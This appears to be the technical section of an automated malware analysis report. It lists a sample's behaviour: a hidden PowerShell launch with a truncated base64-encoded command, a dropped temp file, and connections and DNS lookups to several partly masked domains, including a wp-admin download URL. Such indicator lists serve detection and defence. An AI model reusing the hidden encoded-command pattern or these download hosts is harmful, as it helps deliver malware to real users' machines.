Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABKAGoAZgBiAGkAbwBoAGoAbwBmAGsAagBuAD0AJwBRAHoAcwBmAHcAcABvAHYAZQB6AGsAdABoACcAOwAkAFkAegBsAHQAeABoAHcAcQAgAD0AIAAnADYANwAzACcAOwAkAEQAdQBtAHUAagByAGkAeQBzAHI...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1476
- %TEMP%\1200536.cvr
- 'li##me.com':80
- 'in#####ssdesignbuild.ca':443
- 'ex###gifts.com':443
- http://li##me.com/wp-admin/FT0R5/
- 'in#####ssdesignbuild.ca':443
- 'ex###gifts.com':443
- DNS ASK li##me.com
- DNS ASK th###mera.com
- DNS ASK in#####ssdesignbuild.ca
- DNS ASK fi###ofis.com
- DNS ASK ex###gifts.com